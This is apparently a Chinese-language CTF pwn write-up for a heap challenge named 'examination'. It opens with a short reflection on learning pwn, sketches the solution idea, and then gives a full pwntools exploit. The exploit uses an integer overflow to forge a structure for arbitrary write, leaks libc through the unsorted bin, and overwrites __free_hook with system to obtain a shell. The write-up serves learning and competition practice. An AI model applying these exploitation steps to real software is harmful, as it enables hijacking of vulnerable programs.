写在前面

何谓成长？成长就是当你还未成熟的时候脑海中复现的担当。学pwn已经半年多了，总不能还称自己是新手了吧

从之前栈题都不大会，遇到堆题基本放弃，从见了musl、go、arm就躲到现在终于主动去学习相关的知识，这就是成长。成长不仅仅意味着能力的提升，还意味着心灵的成熟，对学习的态度的变化。

最后，引用最近的脑海中一直复现的鼬神的一句话：

“你并不弱，只是缺乏信念”

题解

思路

通过整型溢出，在note段向上伪造结构体实现任意地址写，修改一个chunk的size，free它放入unsortedbin leak libc，再通过任意地址写修改free_hook为system，然后free('/bin/sh')实现shell的get

有些绕过的细节其实调调就能出

难点

这题让我认识到了自己shit一样的逆向

逆不动的时候，可以放gdb里调调，拿张草稿纸画画或者在旁边注一下自己好理解的形式比如：

exp

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

from pwn import *
from LibcSearcher import *
from pwnlib.util.iters import mbruteforce
from hashlib import sha256
import base64
context.log_level='debug'
##context.terminal = ["tmux", "splitw", "-h"]
context.arch = 'amd64'
context.os = 'linux'
def proof_of_work(sh):
    sh.recvuntil(" == ")
    cipher = sh.recvline().strip().decode("utf8")
    proof = mbruteforce(lambda x: sha256((x).encode()).hexdigest() ==  cipher, string.ascii_letters + string.digits, length=4, method='fixed')
    sh.sendlineafter("input your ????>", proof)
 
##r = remote("chuj.top", 51904)
##proof_of_work(r)
libc=ELF('./libc-2.31.so')
r=process('./examination')
 
def z():
    gdb.attach(r)
 
def cho(num):
    r.sendafter("choice>> ",str(num))
 
def t_add(num):
    cho(1)
    r.sendlineafter('enter the number of questions: ',str(num))
 
def t_view(idx,cont,size): ##first_view
    cho(3)
    r.sendlineafter("which one? > ",str(idx))
    bool_=r.recvuntil('comment:')
    if bool_ == "enter your comment:":
       r.send(cont)  
    else :
       r.sendline(str(size))
       r.sendafter("enter your comment:",cont)
 
def t_delet(idx):
    cho(4)
    r.sendafter("which student id to choose?",str(idx))
 
def t_role(num):
    cho(5)
    r.sendlineafter("role: <0.teacher/1.student>: ",str(num))
 
def s_changeid(idx):
    cho(6)
    r.sendlineafter("input your id: ",str(idx))
 
##pre
r.sendlineafter("role: <0.teacher/1.student>: ",str(0))
t_add(1) #0
t_add(1) #1
t_view(0,hex(0xdeadbeef),0x300)
t_view(1,hex(0xdeadbeef),0x300)
t_role(1)
cho(3)
t_role(0)
cho(2)
 
##leak_heap 
t_role(1)
cho(2)
r.recvuntil("Good Job! Here is your reward! ")
heap=int(r.recvuntil('\n',drop=True),base=16)-0x2a0
log.success('heap:'+hex(heap))
r.sendlineafter("add 1 to wherever you want! addr: ",'00'+str(heap+0x200))
 
##make_fake_struct
s_changeid(-15)
cho(4)
pd=p64(heap+0x968)+p64(0xdeadbeef)+p64(heap+0x338)
r.sendlineafter("enter your mode!",pd)
 
##change chunck(0x55555555f330) size 311 to 621
t_role(0)
t_view(-13,p64(0x621),0x300)
 
##free_2_trew_in_unsortedbin
t_delet(0)
 
##change struct 2 leak libc
t_role(1)
s_changeid(-15)
cho(4)
pd=p64(heap+0x968)+p64(0xdeadbeef)+p64(heap+0x340)
r.sendlineafter("enter your mode!",pd)
s_changeid(-13)
cho(2)
r.recvuntil("here is the review:\n")
libcbase=u64(r.recvuntil('\x7f').ljust(8,'\x00'))-0x1ecbe0
log.success('libcbase:'+hex(libcbase))
 
##set_libc_fuc
free_hook=libcbase+libc.sym['__free_hook']
system=libcbase+libc.sym['system']
log.success('free_hook:'+hex(free_hook))
log.success('system:'+hex(system))
 
##change_free_hook
s_changeid(-15)
cho(4)
pd=p64(heap+0x968)+p64(0xdeadbeef)+p64(free_hook)
r.sendlineafter("enter your mode!",pd)
t_role(0)
t_view(-13,p64(system),0x300)
 
##get_shell
t_add(1)
t_view(1,'/bin/sh\x00',0x300)
t_delet(1)
r.interactive()